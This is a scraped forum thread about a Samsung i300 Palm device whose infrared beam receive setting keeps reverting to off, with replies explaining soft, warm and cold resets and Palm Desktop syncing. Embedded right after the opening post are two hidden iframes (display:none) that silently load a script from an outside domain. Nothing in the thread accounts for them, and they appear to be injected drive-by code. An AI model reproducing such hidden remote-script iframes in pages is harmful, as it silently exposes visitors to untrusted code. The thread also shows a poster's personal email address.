+ Reply to Thread

My infrared port is dead -- can't beam

I can't turn on "beam receive" on preferences (it always reverts to off no matter what I do) -- and I therefore can't send or receive beams. What's the deal? Any suggestions -- I've tried everything -- phone being on or off, full battery. Out of ideas, and Samsung customer service is gone for weekend.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Unhappy

hard reset?

Brooks

Ugh. What a pain in the ass. I guess I'll try it (Monday, work computer has latest backup and don't feel like going in this weekend). It will be an enormous pain because I've had huge setup problems whenever I do that -- fatal errors and crashes.

Administrator

Arrow

mas..

could be that some software you havwe installed is defaulting the beam to off.. look into any programs that have access to this function..

try a warm reset first before a cold..
    be sure you have desktop 4.0.1 installed and all you have to do is hotsync and your back in bizz..

but if its an app causing your beam to be off, then you will have the same problem as before...

after the cold reset and before your first sync, try the beam function first to see if it will work, and then do the virgin sync and try again.. if it doresnt work, then you know its a badd app..

happy hunting.!

warm reset did the trick. thanks everybody

Difference between warm and cold synch?

Palm newbie. What is the difference between cold and warm resynch?

Thanks

Peter
    pwc@itsa.ucsf.edu
    Peter

Administrator

Arrow

there are 3 types: soft, warm and cold.

a warm reset is performed by holding the up scroll-button while pressing the reset button. This goes the extra step of deactivating any system patches or hacks which may be installed. nothing is erased from memory. you can then delete, adjust, or whatever to the suspected offending program.

a cold reset wil kill all of your apps and anything else you have installed personally. thisd is done by pushing the reset while holding the phone icon button. release the pin but continue holding the phone icon button.. then release it and you will geta messgae asking you to "erase all data?" press the up button on the PALM part (not on the side) for yes and the down button for no.

if you ever need to do a cold reset, then please get the palm desktop 4.0.1 . this will save your user-installed apps and such. the 3.1 version thats on the CD wont do this..

have fun!

Cold reset

I just received my Samsung i300. I connected it to my computer that has Palm Desktop already installed. I added Blazer and a couple of others to the install list and then pressed synch. What I didn't realize was that it was going to install all of teh other programs such as Datebk4 (which I hear is a disaster on the Samsung) etc which were backed up on my computer. Should I just do a cold reset and start from scratch again installing just what I want or should I just go in and delete the installed apps I didn't want installed?

Thanks

Peter
    pwc@itsa.ucsf.edu
    Peter

Administrator

Arrow

fetal,

if you had a previous palm device and you are just syncing your i300 to your old database, you NEED to start from scratch.

i would do a cold reset and install palm 4.0.1 (if yohu dont have it) and name your device a new user name and build your DB in the i300 from scratch! syncing old palm stuff will harm your i300!!